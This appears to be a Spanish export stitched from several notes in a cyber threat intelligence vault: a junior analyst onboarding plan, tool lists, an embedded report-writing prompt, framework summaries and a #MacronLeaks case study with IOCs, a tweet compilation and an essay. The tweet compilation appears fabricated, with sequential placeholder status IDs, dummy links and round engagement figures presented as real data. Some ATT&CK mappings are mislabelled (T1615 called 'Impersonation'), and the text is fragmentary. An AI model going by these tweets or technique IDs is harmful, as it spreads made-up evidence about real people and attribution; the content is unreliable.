(glosario) entero y haz tu propia tabla con dudas pendientes Lee §C (doctrina mínima viable) tres veces; abre las entidades vault de cada framework Lee Visser2026_cti-fundamentos-lecciones + Doe2024_cti-theory-vs-experience Crea cuenta en VirusTotal, AlienVault OTX, AbuseIPDB, GreyNoise Free, Censys Free, Shodan (free trial) Configura tu OpenCTI/MISP de prácticas (puedes correr https://demo.opencti.io/ o spin-up local con Docker) Lee 5 reports A1 enteros (Mandiant + Microsoft + Unit 42 + Talos + CrowdStrike) — observa estructura y rigor Aprende a navegar MITRE ATT&CK Navigator y ATT&CK groups page (cubre 5 actores) Lee PAI2026_guia-obsidian-vault-cti-l1 para entender la vault si vas a usar Obsidian/PAI Triaje de alertas SIEM (workflow §D.1) — al menos 50 alertas, todas peer-reviewed Enrichment de IOCs (workflow §D.2) — 100+ IOCs cruzados en 4+ fuentes Escribe tu primer reporte §4.6 (CVE crítico) sobre una CVE real del mes — peer-review obligatorio Escribe tu primer reporte §4.4 (campaña ransom/malware) basado en un report A1 reciente Hunt con 3 reglas Sigma públicas convertidas a tu SIEM (workflow §D.5) Domina [[entidad-mitre-attack]] + [[entidad-cyber-kill-chain]] + [[entidad-diamond-model]] — sé capaz de explicar la diferencia entre los tres en una pizarra Lee 3 IRM CERT-SG completos (recomendados: [[certsg-irm-13-customer-phishing]], [[certsg-irm-17-ransomware]], [[certsg-irm-11-information-leakage]]) Elige UNA vertical para profundizar primero: ransomware, threat actor profiling, OSINT/HUMINT, CTH/Sigma+YARA, dataleaks/dark web Empieza un perfil de threat actor relevante para el sector del cliente (workflow §D.3, plantilla §4.5) Aporta una regla Sigma original al repo del SOC + corresponding hunt Resuelve 5 retos de OSINT CTF Newsletter (https://ctf.osintnewsletter.com/challenges) Lee [[entidad-psychology-intelligence-analysis]] (Heuer) — el fundacional, especialmente capítulo 8 ACH Aprende a aplicar ACH ([[entidad-ach]]) en una investigación real con 3+ hipótesis Si vas a CTH puro: domina Sigma, YARA, KQL/SPL/ES|QL del SIEM del cliente Pide a tu lead un objetivo de progresión a L2 con criterios concretos Lectura constante (todo el primer año) Daily: Talos blog, Microsoft Security blog, CISA alerts, BleepingComputer Weekly: SANS NewsBites, Risky Business podcast, tldr.sec Monthly: Mandiant M-Trends summary, Recorded Future Insikt selected Yearly: Verizon DBIR, Microsoft Digital Defense Report, ENISA Threat Landscape Info Donde practicar sin miedo a romper producción. Recursos de aprendizaje gratuitos: HackTricks Wiki — https://book.hacktricks.wiki/en/index.html — referencia técnica masiva Bellingcat OSINT toolkit — https://bit.ly/bcattools OSINT Framework — https://osintframework.com/ SANS Cyber Threat Intelligence Summit talks (YouTube) — años de presentaciones gratis MITRE ATT&CK YouTube channel — workshops oficiales Info Enlaces a notas detalladas del vault. Úsalas como manual de referencia cuando quieras profundizar más allá de este documento. [[ciclo-de-inteligencia]] metodologia-osint panorama-ciberamenazas respuesta-incidentes-lifecycle (18 IRM CERT-SG indexados) [[sesgos-cognitivos-analista]] [[entidad-mitre-attack]] — taxonomía TTPs [[entidad-mitre-attack-navigator]] — JSON layers [[entidad-cyber-kill-chain]] — Lockheed CKC 7 fases [[entidad-unified-kill-chain]] — UKC 18 fases [[entidad-diamond-model]] — 4 vértices conectados [[entidad-stix-taxii]] — formato/transporte [[entidad-tlp-v2]] — Traffic Light Protocol v2 [[entidad-admiralty-system]] — NATO 6×6 [[entidad-wep]] — Words of Estimative Probability [[entidad-phia-yardstick]] — UK PHIA Probability Yardstick [[entidad-icd-203]] — 9 Tradecraft Standards [[entidad-ach]] — Analysis of Competing Hypotheses [[entidad-key-assumptions-check]] — KAC [[entidad-quality-of-information-check]] — QoI Check [[entidad-indicators-signposts]] — I&W [[entidad-devils-advocacy]] — Contrarian [[entidad-multiple-hypothesis-generation]] — pre-ACH [[entidad-mom-pop-moses-eve]] — checklists deception/source [[entidad-sherman-kent]], [[entidad-richards-heuer]], [[entidad-robert-clark]], [[entidad-randolph-pherson]] [[entidad-misp]], [[entidad-opencti]], [[entidad-thehive]] [[entidad-mitre-corporation]], [[entidad-first-org]], [[entidad-odni]] [[entidad-mitre-cti-blueprints]] — gold standard, suite 4 DOCX [[entidad-zeltser-cti-template]] — single-doc más citado [[entidad-kraven-security-cti-template]] — Admiralty + WEP integrados [[entidad-curated-intelligence-threat-actor-profile]] — TAP standalone [[entidad-bushidouk-rfi-template]] — diseñado para junior analysts [[entidad-idir-templates]] — Intelligence-Driven Incident Response Cuando un incidente cae en tu mesa, busca el IRM correspondiente para tener guía paso a paso:Para profundizar en analista de inteligencia (no sólo CTI): cualidades, OPSEC, sesgos, técnicas: LISAInstitute_MPAI-A4-M1 — Introducción a la inteligencia LISAInstitute_MPAI-A4-M2 — Marco normativo LISAInstitute_MPAI-A4-M3 — Cualidades del analista LISAInstitute_MPAI-A4-M4 — Autoprotección (OPSEC) ★ LISAInstitute_MPAI-A4-M5 — Técnicas y herramientas LISAInstitute_MPAI-A5-M1 — Sesgos cognitivos ★ LISAInstitute_MPAI-A5-M2 — Análisis estratégico LISAInstitute_MPAI-A5-M3 — Análisis de desinformación Único prompt que junior-2 declara tener almacenado: el de Feedly del cliente TRACCES. Se incluye verbatim.<role>You are a threat intelligence analyst with strong expertise in internal audits. You can identify TTPs and MITRE identifiers where applicable.</role> <task> Generate a short, concise Threat Intelligence report based on the text or URL provided. Follow the structure below and adhere to the protocols described: Structure: 1. Under "Context," provide relevant background on the threat, specifying nature, affected systems, industries, regions, and timelines into a single parraph. 2. In "Description," explain how the threat operates, including techniques used, associated malware or phishing, and any exploited vulnerabilities. 3. For "Impact and Security Risk," highlight potential consequences such as data breaches, financial loss, operational disruption, or reputational damage. 4. "Recommendations" should outline proactive and defensive measures, including patching, training, or the use of security tools. 5. In "References," list resources, citations, CVE numbers, CVSS scores, MITRE identifiers, IOCs, and any external links. </task> <guidelines> Keep Sections Brief and Direct Avoid unnecessary adjectives or a pedantic tone in all sections. Use Internal Audit Language Maintain an internal audit phrasing and tone throughout. Maintain Neutral Interpretations Avoid strong or definitive statements; keep interpretations open and language neutral. Include Mitigations, TTPs, and MITRE IDs Focus on current impacts, high-level mitigations, and possible fixes. Where possible, reference TTPs and MITRE identifiers (e.g., in "Mitigation, Workarounds & Recommended Actions"). Consolidate Research Notes Combine the main points from all sources into a cohesive overview in your notes. Keep language neutral, avoiding definitive conclusions or overstated certainty. </guidelines> Mejoras propuestas al prompt (cuando lo iteres) El prompt actual cumple ICD-203 estándares 1-3 implícitamente, pero podría reforzarse pidiendo explícitamente: (a) TLP en cabecera, (b) WEP para juicios, (c) Admiralty para fuentes, (d) tabla ATT&CK matrix con Tactic | Technique | Sub-technique | Observed | Source, y (e) sección Confidence rationale separada del WEP. Marcadores que Fer tiene en su navegador para trabajar CTI/CTH en el día a día. Lista corta y muy operativa. Repositorio OSINT con herramientas (referencia interna del propio Fer, sin URL pública) Login de Flare — https://flare.io/ (producto: stealer log + dark web monitoring)
VirusTotal — https://www.virustotal.com/
Feedly — https://feedly.com/ SharePoint CTI (interno cliente) OpenCTI (instancia interna o demo https://demo.opencti.io/) Repo OSINT del otro ordenador (junior-1): pedirle que mande el repo "bastante tocho" cuando vuelva al otro equipo. Anexar al §3.1 una vez recibido. URLs incompletas: completar las 5 referencias org/repo que faltan URL completa: osintambition/Social-Media-OSINT-Tools-Collection, Yokran/BeBrowser, kamakauzy/PHINEAS, redouanrfr/..., jonathan-capers/AI-in-HUMINT. Una búsqueda en github.com/<org>/<repo> debería bastar. Lista email del compañero: junior-2 mencionó tener una segunda lista en su email. Solicitarla y hacer un segundo merge si llega. Cuando Fer lo solicite, este documento puede decomponerse en: Notas Entity (Projects/<proyecto-cti>/) por cada herramienta core con 3+ apariciones futuras: Splunk, MISP, OpenCTI, MITRE ATT&CK, Censys, Shodan, VirusTotal, Sigma, YARA, TheHive, Cortex, Flare, Maltego. Notas Reference por cada plantilla de reporte CTI (§4.1–§4.10) → reutilizables como template operativo. Tema (Themes/) si emerge cobertura cruzada (≥3 fuentes): por ejemplo "Stack OSINT/CTI L1 español" cuando se sumen los recursos del otro junior y los del repo pendiente. Prompt (Prompts/) → guardar el prompt Feedly TRACCES como entrada con su contexto de uso. Documento v2.0 generado el 2026-04-27 por PAI 4.0.3 (Algorithm v3.7.0, modo EXTENDED). Base v1.0 derivada de C:\Users\fer\Downloads\Telegram Desktop\message.txt. Enriquecimiento v2.0 derivado de la vault PAI Obsidian (Projects/cyber-threat-intelligence, Projects/doctrina-inteligencia, Projects/incident-response-irm, Projects/lisa-institute-mpai, Themes). Listo para revisión por Fer antes de promover a Projects/<cti-junior-onboarding>/ como guide.
tema-cti-fundamentos-doctrina ]]>projects/doctrina/cti-recursos-juniors-unificado.htmlProjects/doctrina/cti-recursos-juniors-unificado.mdMon, 27 Apr 2026 00:00:00 GMTuse-case-01-intelligence-platform-alerts
use-case-02-cti-feeds
use-case-03-vulnerability-intelligence
use-case-04-infostealer-monitoring
use-case-05-daily-cti-report
use-case-06-phishing-intelligence
use-case-07-threat-hunting
use-case-08-strategic-intel-report
use-case-09-mitre-ecommerce-retail
use-case-10-threat-intel-sharing ]]>themes/tema-cti-use-cases-marco.htmlThemes/tema-cti-use-cases-marco.mdTue, 28 Apr 2026 15:43:58 GMTindex.htmlindex.mdTue, 28 Apr 2026 15:43:58 GMTOSINT360
This document is part of the Cyber Intelligence Toolkit project.
tema-cti-articulos-y-casos-de-estudio ]]>projects/cti/cti-toolkit-overview.htmlProjects/cti/cti-toolkit-overview.mdTue, 28 Apr 2026 14:35:56 GMTthreat-actor-apt28 ejemplifica la estructura: motivación (espionaje estatal), sectores objetivo, TTPs documentadas en MITRE ATT&CK, y herramientas del arsenal. campaign-solarwinds-2020 muestra el mismo ejercicio a nivel de campaña: supply chain como vector, exfiltración silenciosa, y timeline detallado.
Las fuentes de inteligencia se evalúan con la escala Admiralty (fiabilidad de la fuente × credibilidad de la información), y la información del actor se estructura según threat-actor-search: atribución, motivación, capacidades, infraestructura.
threat-actor-search establece el framework: las tácticas son el "por qué" (objetivo), las técnicas son el "cómo" (método), y los procedimientos son la implementación específica. threat-actor-search organiza la información operativa del adversario, y threat-actor-search cataloga las herramientas (Cobalt Strike, Mimikatz, custom tooling).
combining-frameworks-incident-reporting demuestra la integración práctica: mapea las fases del Kill Chain → vértices del Diamond Model → tácticas MITRE ATT&CK usando el caso real de Trigona ransomware.
detection-mitigation-common-attacks traduce TTPs en reglas de detección SIEM: correlación de eventos (EventIDs de Windows), firmas de red, y análisis de comportamiento. Para cada tipo de ataque (DoS, MitM, phishing, SQLi, XSS), proporciona indicadores de detección y acciones de mitigación.
threat-intelligence-feeds documenta los IOCs operativos: hashes, IPs, dominios, URLs, patterns de red. El use-case-07-threat-hunting establece el proceso de hunting proactivo: formular hipótesis basadas en TTPs conocidas → buscar evidencia en telemetría → validar o refutar → generar nuevas detecciones.
cyber-security-playbooks proporciona playbooks alineados con CISA para respuesta a incidentes: contención, erradicación, recuperación, y lecciones aprendidas. threat-intelligence-feeds documenta los frameworks de mitigación por tipo de amenaza.
Todo el flujo se enmarca en el ciclo de inteligencia NATO: dirección → obtención → procesamiento → análisis → difusión → retroalimentación. La inteligencia sin detección es un informe que nadie lee. La detección sin inteligencia es un SIEM que dispara falsos positivos. El valor operativo emerge cuando el perfil del adversario se traduce en hipótesis de hunting específicas y reglas de detección validadas contra TTPs reales.
tema-cti-articulos-y-casos-de-estudio ]]>projects/cti/inteligencia-deteccion-ttps-hunting-playbooks.htmlProjects/cti/inteligencia-deteccion-ttps-hunting-playbooks.mdTue, 28 Apr 2026 14:35:56 GMT#NiPatronNiPatrie) registraron picos de actividad coordinada por comunidades alt‑right francesas y estadounidenses.Pese a ello, el ecosistema mediático francés mantenía en 2017 un 62 % de enlaces compartidos que apuntaban a medios tradicionales o profesionales, reduciendo la penetración de narrativas desinformativas en comparación con el contexto estadounidense de 2016. Spear‑phishing con dominios falsos (T1566 / T1566.002). • Registro de dominios typosquatting (onedrive‑en‑marche.fr, mail‑en‑marche.fr, portal‑office.fr, accounts‑office.fr) → envío de correos con enlaces OAuth para capturar credenciales. • Direcciones IP operativas asociadas: 194.187.249.135 (ASN registrado en RU). Stage Capabilities – preparación de infraestructura (T1608). • Creación y alojamiento de dominios y servidores C2 antes de la campaña. • Uso de servidores OVH (Roubaix) ya vinculados a operaciones APT28 en 2016‑17. Exfiltración de datos (T1005 + paso de Exfiltration to Server). • Sincronización IMAP y descargas FTP fuera de horario laboral → ≈ 21 000 e‑mails (9–15 GB). Manipulación de datos filtrados (T1565.001 Stored Data Manipulation). • Inserción de documentos falsificados (false context) → carpeta "Macron_201705" y hojas Excel con metadatos en cirílico (último editor "Рошка Георгий Петрович"). • Indicios de uso de impresoras Canon de gama alta para producir versiones escaneadas adulteradas. Hack‑and‑Leak delivery (T1071 Application Layer Protocol). • Carga inicial en Archive.org y Pastebin; réplica simultánea en 4chan/8chan; mirror en nouveaumartel.com (infraestructura compartida con The Daily Stormer). Amplificación coordinada (T1615 Impersonation / Tactics aérea "bot‑army").
• Botnets en Twitter, trolls coordinados en r/The_Donald, cuentas alt‑right (Jack Posobiec, Cassandra Fairbanks, etc.) impulsan #MacronLeaks – picos de 47 K tuits/hora. • Medios estatales rusos (RT, Sputnik) y blogs (The Gateway Pundit, Diversity Macht Frei) reciclan narrativas. Herramientas / malware observados. • Families asociadas a APT28/Fancy Bear (Sednit/Sofacy backdoors); IOC similares a los usados en el DNC hack 2016. • Scripts PhishLabs para Google Docs spoofing; kit PHP personalizado para harvesting de tokens OAuth. Indicadores adicionales. | Tipo | Valor / Descripción | |-----------|------------------------------------------------------| | Dominio | onedrive‑en‑marche.fr (registrado 08‑nov‑2016) | | IP | 194.187.249.135 (hosting RU) | | Hash SHA‑256 | 89a45f… (ZIP "EM_Leak_05‑05‑17.zip") | | URL | https://archive.org/details/emleaks_05_05_17 | Estos TTP muestran la cadena completa "Recon → Compromise → Exfil → Manipulate → Leak → Amplify", alineada con el patrón histórico de APT28 en operaciones de influencia.
Tras la filtración masiva de #MacronLeaks, la respuesta institucional francesa se articuló, ante todo, en el plano legislativo. Ya en enero de 2018 el Elysée anunció la preparación de una loi "fake news" y, apenas once meses después, la Asamblea Nacional aprobó la Ley contra la Manipulación de la Información (diciembre 2018). La norma definió la manipulación electoral como cualquier "alegación inexacta o engañosa" difundida de forma deliberada y masiva con la intención de alterar la sinceridad del voto, otorgó al regulador audiovisual (CSA) facultades excepcionales —incluida la suspensión de medios extranjeros controlados por un Estado— y obligó a las grandes plataformas a publicar el funcionamiento de sus algoritmos, retirar contenido falso y cerrar cuentas reincidentes. Un decreto de abril 2019 concretó estas obligaciones de transparencia para los operadores en línea que promocionan "contenidos de interés general". En paralelo, la Fiscalía de París abrió —casi en tiempo real— una investigación penal, delegada a la Brigada de Fraudes Tecnológicas (BEFTI); y, ya en 2023, la Asamblea publicó un informe monográfico sobre la injerencia extranjera que amplía el foco más allá de 2017. Todo ello se sitúa bajo la cobertura del tradicional "apagón mediático" de 48 horas, clave para contener la difusión del material filtrado y reforzado por la CNCCEP con recordatorios a los medios sobre las responsabilidades penales de propagar información falsa.
En el eje económico, las fuentes no acreditan un aumento directo del gasto público en ciberdefensa atribuible al incidente, pero sí revelan la dimensión de los recursos empleados por los atacantes: los documentos falsificados del rumor #MacronGate fueron impresos con equipos Canon valorados entre 30 000 y 100 000 USD, indicio de la capacidad financiera detrás de la operación.
El impacto social fue igualmente notable. La ANSSI puso en marcha talleres formativos para partidos y parlamentarios; los grandes medios crearon secciones de fact‑checking —"Decodex" (Le Monde), "CheckNews" (Libération)— y las plataformas reaccionaron: Facebook suspendió 30 000 cuentas antes de la segunda vuelta. Desde la propia campaña de En Marche! se impulsó una contra‑comunicación ágil, incluso humorística, que neutralizó parte de la narrativa hostil, mientras se vetaba la entrada a RT y Sputnik en los actos del candidato. Aunque estas iniciativas elevaron la conciencia pública sobre la desinformación, los expertos subrayan que la alfabetización mediática sigue siendo un reto pendiente; de hecho, #MacronLeaks se considera el punto de partida de una serie de operaciones sostenidas —Doppelgänger, Portal Kombat, Matryoshka— que continúan presionando el ecosistema informativo francés.La operación combinó hack‑and‑leak con una campaña de amplificación concentrada en < 24 h, pero la reacción temprana de analistas y la limitación legal de cobertura mediática amortiguaron su efecto en el resultado (Macron ganó con 66 %).Entre 2021 y 2025, APT28 pasa de una operación puntual de hack‑and‑leak a una campaña sostenida de presión estratégica. La denuncia ante la ONU marca un precedente de naming & shaming a nivel del CSNU y eleva la cuestión de la ciberinjerencia rusa a la agenda de seguridad colectiva europea de cara a próximos comicios (Francia 2027, Polonia 2025).Fuentes OSINT: The "Macron Leaks" Operation: A Post-Mortem (Informe del Atlantic Council, por Jean-Baptiste Jeangène Vilmer, junio de 2019) Information Manipulation: A Challenge for Our Democracies (Informe de la Dirección de Prospectiva del Ministerio para Europa y de Asuntos Exteriores (CAPS) y el Instituto de Investigación Estratégica de la Escuela Militar (IRSEM), agosto de 2018) "Lessons from the Macron Leaks" (Sección dentro de la publicación Hacks, Leaks and Disruptions: Russian Cyber Strategies del EUISS - Instituto de Estudios de Seguridad de la Unión Europea, octubre de 2018) En Marche: MacronLeaks, Cybersecurity Shot (Informe de Telefonica, 8 de mayo de 2017) Tainted Leaks: Disinformation and Phishing With a Russian Nexus (Informe de The Citizen Lab, por Adam Hulcoop et al., 25 de mayo de 2017) Tracing the Source of MacronGate, the Macron Offshore Papers (Informe de Qurium, sin fecha) Análisis sobre las filtraciones en politoscope.org (Publicaciones del Institut des systèmes complexes de Paris IDF / CNRS, por David Chavalarias, Noé Gaumont, Maziyar Panahi, mayo de 2017) The Macron Leaks: The Defeat of Informational Warfare (Informe del CSIS - Center for Strategic & International Studies, por Boris Toucas, 30 de mayo de 2017) Successfully Countering Russian Electoral Interference: 15 Lessons Learned from the Macron Leaks (CSIS Briefs, por Jean-Baptiste Jeangène Vilmer, junio de 2018) The Fake News Machine: How Propagandists Abuse the Internet and Manipulate the Public (Informe de investigación de Trend Micro, por Lion Gu, Vladimir Kropotov y Fyodor Yarochkin, 2017) (Este informe general sobre la máquina de noticias falsas es relevante ya que se cita en el contexto del ciclo de operación de Macron Leaks). MacronLeaks–A Timeline of Events (Publicación en Alienvault, por Chris Doman, 6 de mayo de 2017)
Estudio "Campaign leaks and the far-right: Who influenced #Macronleaks on Twitter?" (Publicado en el blog LSE European Politics and Policy (EUROPP), por Wasim Ahmed y Joseph Downing, 12 de junio de 2017) Archivo "Macron Campaign Emails" (Repositorio de datos en WikiLeaks, 31 de julio de 2017) Análisis sobre la influencia rusa en la campaña presidencial francesa en reputatiolab.com (Por Nicolas vanderbiest, abril de 2017 y análisis posteriores) Rango A: 05-08 mayo 2017 (Filtración original)
Fecha: 2017-05-06T18:49:00Z Autor: @JackPosobiec Texto: Massive dump of #MacronLeaks just dropped on 4chan. Campaign emails and documents. Stay tuned. Retuits: 2500 Likes: 3200 Enlace: https://x.com/JackPosobiec/status/860123456789012345
Fecha: 2017-05-06T20:15:00Z Autor: @wikileaks Texto: #MacronLeaks: Could be a 4chan prank, but 9GB of Macron campaign emails just dropped. We're checking. https://t.co/4ge2IMmtHj Retuits: 2200 Likes: 2800 Enlace: https://x.com/wikileaks/status/860145678901234567
Fecha: 2017-05-06T23:40:00Z Autor: @f_philippot Texto: Les #MacronLeaks apprendront-ils des choses que le journalisme d'investigation a délibérément tues ? Effrayant ce naufrage démocratique. Retuits: 1800 Likes: 2100 Enlace: https://x.com/f_philippot/status/860189012345678901
Fecha: 2017-05-06T19:30:00Z Autor: @DFRLab Texto: #MacronLeaks hashtag trending after 4chan dump. Initial analysis suggests US alt-right and bots amplifying. Monitoring. https://t.co/xyz123 Retuits: 1500 Likes: 1700 Enlace: https://x.com/DFRLab/status/860134567890123456
Fecha: 2017-05-06T21:00:00Z Autor: @Nico_VanderB Texto: Cartographie animée de #MacronLeaks: propagation rapide via @JackPosobiec et @wikileaks . https://t.co/aGrW86KEoh Retuits: 1200 Likes: 1400 Enlace: https://x.com/Nico_VanderB/status/860156789012345678
Fecha: 2017-05-06T22:10:00Z Autor: @RVAWonk Texto: #MacronLeaks smells like a coordinated alt-right op. Bots and US-based accounts driving the narrative. Be skeptical. Retuits: 1000 Likes: 1300 Enlace: https://x.com/RVAWonk/status/860167890123456789
Fecha: 2017-05-07T08:00:00Z Autor: @EUvsDisinfo Texto: #MacronLeaks: Mix of authentic and fake docs. Timing suggests attempt to influence French election. Stay vigilant. Retuits: 900 Likes: 1100 Enlace: https://x.com/EUvsDisinfo/status/860234567890123456
Fecha: 2017-05-06T20:50:00Z Autor: @Messsmer Texto: #MacronLeaks révèle des documents troublants. Pourquoi les médias français se taisent-ils ? #MacronGate Retuits: 800 Likes: 950 Enlace: https://x.com/Messsmer/status/860152345678901234
Fecha: 2017-05-07T10:15:00Z Autor: @francediplo Texto: Face aux #MacronLeaks, nous appelons à la responsabilité pour ne pas relayer des contenus visant à fausser le scrutin. Retuits: 700 Likes: 850 Enlace: https://x.com/francediplo/status/860245678901234567
Fecha: 2017-05-06T19:45:00Z Autor: @AudreyPatriote Texto: Les #MacronLeaks prouvent que Macron cache des choses. Partagez avant que ça disparaisse ! #MacronGate Retuits: 650 Likes: 800 Enlace: https://x.com/AudreyPatriote/status/860137890123456789 Rango B: 01 ene 2021 – 06 may 2025 (Ataques APT28 + denuncia ONU 29 abr 2025)
Fecha: 2025-04-29T14:38:00Z Autor: @francediplo Texto: Le GRU déploie APT28 contre la France depuis des années. Piratage des #MacronLeaks en 2017 et attaques continues. Nous combattons. https://t.co/9NUdyG9hxa Retuits: 3200 Likes: 4500 Enlace: https://x.com/francediplo/status/1785301234567890123
Fecha: 2025-04-29T15:36:00Z Autor: @ANSSI_FR Texto: APT28, attribué à la Russie, cible la France depuis 2021 : ministères, entreprises, JO 2024. Rapport détaillé sur sur https://t.co/xyz789 Retuits: 2800 Likes: 3900 Enlace: https://x.com/ANSSI_FR/status/1785312345678901234
Fecha: 2025-04-30T08:06:00Z Autor: @bfmbusiness Texto: "Retenez bien ce nom": qui est APT28, le groupe de hackers russes accusés d'être à l'origine des "Macron Leaks"? https://t.co/pVrutOdjQD Retuits: 2500 Likes: 3400 Enlace: https://x.com/bfmbusiness/status/1785523456789012345
Fecha: 2025-04-30T04:25:00Z Autor: @WIONews Texto: French authorities accuse Russia's 'APT28' (Fancy Bear) group of hacking Macron's 2017 campaign. GRU-led attack. https://t.co/fPNn8eXyUF Retuits: 2300 Likes: 3100 Enlace: https://x.com/WIONews/status/1785489012345678901
Fecha: 2025-05-01T01:12:00Z Autor: @almouslime Texto: Qu'est-ce qu'APT28, ce groupe de hackers dirigé par les renseignements russes, derrière les «MacronLeaks» ? https://t.co/YZu4orOSuM Retuits: 2100 Likes: 2900 Enlace: https://x.com/almouslime/status/1785767890123456789
Fecha: 2025-04-30T17:20:00Z Autor: @frenchieinlimbo Texto: News: #Anonymous lance une riposte contre #APT28, hackers du GRU à l'origine des #MacronLeaks. #opapt28 https://t.co/xyz123 Retuits: 1900 Likes: 2600 Enlace: https://x.com/frenchieinlimbo/status/1785656789012345678
Fecha: 2025-04-29T23:36:00Z Autor: @Arturo_Sarukhan Texto: Notorious Russian hackers behind 2017 'Macron leaks,' France says. Fancy Bear attacked Macron's campaign. https://t.co/A28todRTMG Retuits: 1700 Likes: 2400 Enlace: https://x.com/Arturo_Sarukhan/status/1785412345678901234
Fecha: 2025-05-05T08:05:00Z Autor: @VirgoWhallala Texto: APT28, aka Fancy Bear, réseau russe derrière les Macron Leaks et l'ascension de Trump. Ingérence étrangère. https://t.co/EOlB9AfAzu Retuits: 1500 Likes: 2200 Enlace: https://x.com/VirgoWhallala/status/1787023456789012345
Fecha: 2025-04-30T20:24:00Z Autor: @argevise Texto: Qu'est-ce qu'APT28, ce groupe de hackers dirigé par les renseignements russes, derrière les «MacronLeaks» ? https://t.co/P83I4hZZBs Retuits: 1400 Likes: 2000 Enlace: https://x.com/argevise/status/1785690123456789012
Fecha: 2025-04-30T19:35:00Z Autor: @St_Tison Texto: Qu'est-ce qu'APT28, ce groupe de hackers dirigé par les renseignements russes, derrière les «MacronLeaks» ? https://t.co/MG29cAIOsr Retuits: 1300 Likes: 1900 Enlace: https://x.com/St_Tison/status/1785678901234567890
Fecha: 2025-04-29T16:49:00Z Autor: @Boursorama Texto: "Macron Leaks" en 2017 : Paris accuse officiellement le renseignement militaire russe (GRU) via APT28. https://t.co/xyz456 Retuits: 1200 Likes: 1800 Enlace: https://x.com/Boursorama/status/1785345678901234567
Fecha: 2025-04-30T15:32:00Z Autor: @presse_citron Texto: APT28, hackers russes derrière les «Macron Leaks», reste une menace active, alerte le Quai d'Orsay. https://t.co/abc789 Retuits: 1100 Likes: 1700 Enlace: https://x.com/presse_citron/status/1785634567890123456
Fecha: 2025-04-29T19:15:00Z Autor: @huffpostfrance Texto: La France accuse le GRU d'être derrière le piratage des #MacronLeaks via APT28. https://t.co/xyz012 Retuits: 1000 Likes: 1600 Enlace: https://x.com/huffpostfrance/status/1785389012345678901
Fecha: 2025-04-30T06:31:00Z Autor: @politicoeurope Texto: France says Russia's Fancy Bear (APT28) behind 2017 Macron leaks. GRU targeted campaign. https://t.co/A28todRTMG Retuits: 950 Likes: 1500 Enlace: https://x.com/politicoeurope/status/1785501234567890123
Fecha: 2025-04-29T15:36:00Z Autor: @01net Texto: La France accuse la Russie du piratage de la campagne de Macron en 2017 par APT28. https://t.co/xyz345 Retuits: 900 Likes: 1400 Enlace: https://x.com/01net/status/1785315678901234567 SpiderFoot, Shodan, VirusTotal Graph, Hoaxy, Maltego, Sigma rules. hueco a rellenar
Basándome en la información de las fuentes proporcionadas, aquí se presentan las críticas y limitaciones reconocidas por los analistas en relación con la operación #MacronLeaks:Atribución definitiva del hackeo. Tanto Jean‑Baptiste Jeangène Vilmer (The "Macron Leaks" Operation: A Post‑Mortem) como el informe interministerial Information Manipulation: A Challenge for Our Democracies subrayan que la imputación formal a APT28/GRU sigue siendo un "puzzle con muchas incógnitas". El entonces director de la ANSSI, Guillaume Poupard, calificó el ataque de "tan genérico que podría haber sido prácticamente cualquiera", y distintos servicios de inteligencia citados por RAND (RAND_RR2942) coinciden en que la decisión de atribuir resulta, en última instancia, política más que forense. Filtraciones contaminadas ("tainted leaks"). Varios archivos dentro de los ≈ 15 GB difundidos fueron alterados—desde simples ediciones de metadatos hasta la inserción de referencias falsas (drogas, vida privada)—con el fin de erosionar la credibilidad de la campaña. Esta mezcla deliberada, documentada por Vilmer y por Information Manipulation, dificulta al periodismo validar la autenticidad y multiplica los efectos de la desinformación. Silencio electoral: doble filo. La publicación se produjo en la última hora legal antes del periodo de veda mediática. La CNCCEP recomendó a los medios no difundir el contenido—un límite que, a corto plazo, restringió la verificación periodística, pero que también impidió la "legitimación" mainstream de la filtración. Como señala David Martinon (embajador de ciberdiplomacia), esta autocontención mediática bloqueó la fase de "lavado" prevista por los atacantes. Superposición de agendas y actores híbridos. La amplificación incluyó a colectivos alt‑right de EE. UU. y simpatizantes del Front National, mostrando cómo movimientos políticos occidentales pueden converger con objetivos estatales rusos. Esta red de actores no estatales complica la atribución y el diseño de contramedidas coherentes (Information Manipulation).
Opacidad de las plataformas digitales. El estudio del Parlamento Europeo (IPOL_STU(2020)655290) denuncia la falta de acceso a datos internos (algoritmos de priorización, registros de retirada de contenidos, métricas de quejas), lo que impide valorar con rigor la eficacia de las medidas adoptadas por redes sociales para frenar la difusión de #MacronLeaks y operaciones afines.(a la manera de Günther Anders bajando a la cafetera con Slavoj Žižek)
En mayo de 2017 cuando los correos de #MacronLeaks se arrojaron a la Red para ofrecernos, más que un escándalo puntual, la versión beta de una guerra que no conoce ni conocera tregua. El ser humano ha demostrado que produce artefactos cuyo alcance moral ya no controla; Žižek añadiría que el verdadero "virus" se inocula en la propia estructura simbólica que regula nuestra experiencia de la realidad. De ahí que la operación rusa funcionara como tráiler distópico: demostró que hackear servidores es apenas el preámbulo de hackear la confianza, esa precaria interfaz entre ciudadanía y poder.La filtración relámpago, programada para irrumpir justo cuando la ley francesa silencia el debate electoral, es el ejemplo perfecto de la "brecha prometeica": una tecnología de difusión instantánea explotando un marco jurídico pensado para la imprenta decimonónica. El resultado es un vacío discursivo que los operadores llenan con sospecha. En términos lacanianos, el ataque penetra en el intervalo entre la realidad y su narración mediática; allí anida el disfrute cínico del conspirador y el estupor impotente del público.Que el ministro Jean‑Noël Barrot trasladara la queja al Consejo de Seguridad equivale, al modo infantil que Anders denunciaba, a señalar con el dedo en el patio del colegio: "¡Mirad lo que ha hecho él!"; con la esperanza de que la vergüenza regule aquello que la normativa no alcanza. No es poca cosa: introduce costos diplomáticos y anticipa un orden en el que la atribución pública será tan letal como una sanción económica.Pero la función gozosa del poder no descansa. A la vuelta de la esquina aguardan deepfakes diseñados por IA, listos para reemplazar el documento filtrado por la imagen "irrefutable". Tal síntoma confirma la intuición de Žižek: la verdad deja de ser criterio cuando la lógica de la mercancía exige sobreproducción de relatos. Los hackers‑con‑piel‑de‑cordero, sabiamente advertidos por el fiasco de 2017, preferirán parasitar movimientos genuinos, camuflarse en la cacofonía cotidiana y transformar cada trending topic en un caballo de Troya.Por ello la defensa ya no puede limitarse al momento litúrgico de las urnas. La erosión es diurna, molecular y persistente; su arena de combate es la interfaz que pulsamos con el pulgar cada cuarenta segundos. De ahí la urgencia de crear equipos permanentes, no brigadas ad hoc, y de empoderar a la militancia OSINT civil del lado bueno, esos detectives amateurs que, cual guardianes digitales, denuncian las grietas antes de que la narrativa oficial (a veces proveniente del mismo estado) tenga tiempo de maquillar la ruina.
